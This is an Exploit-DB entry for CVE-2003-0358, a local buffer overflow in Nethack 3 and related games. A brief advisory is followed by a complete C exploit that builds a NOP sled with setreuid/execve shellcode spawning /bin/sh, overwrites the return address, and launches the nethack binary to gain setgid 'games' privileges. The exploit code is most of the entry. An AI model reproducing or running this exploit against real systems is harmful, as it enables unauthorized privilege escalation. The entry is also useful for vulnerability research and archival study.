Nethack 3 - Local Buffer Overflow Vulnerability 1

2003-02-10T00:00:00
ID EDB-ID:22233
Type exploitdb
Reporter tsao@efnet
Modified 2003-02-10T00:00:00

Description

Nethack 3 Local Buffer Overflow Vulnerability (1). CVE-2003-0358. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/6806/info

By passing an overly large string when invoking nethack, it is possible to corrupt memory.

By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.

slashem, jnethack and falconseye are also prone to this vulnerability.

/*
        tsao@efnet #!IC@efnet 2k3
        thnx to aleph1 for execve shellcode &
        davidicke for setreuid() shellcode
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


char code[] =

"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";



unsigned long sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char **argv) {
     char *p;
     int i, off;

     p = malloc(sizeof(char) * atoi(argv[1]));
     memset(p,0x90,atoi(argv[1]));

     off = 220 - strlen(code);
     printf("shellcode at %d->%d\n",off,off+strlen(code));
     for(i=0;i<atoi(argv[1]);i++)
       p[i+off] = code[i];


     *(long *) &p[220] = sp() - atoi(argv[2]);
     printf("Using %x\n",sp() - atoi(argv[2]));

     execl("/usr/games/lib/nethackdir/nethack","nethack","-s",p,0);
     perror("wtf");
}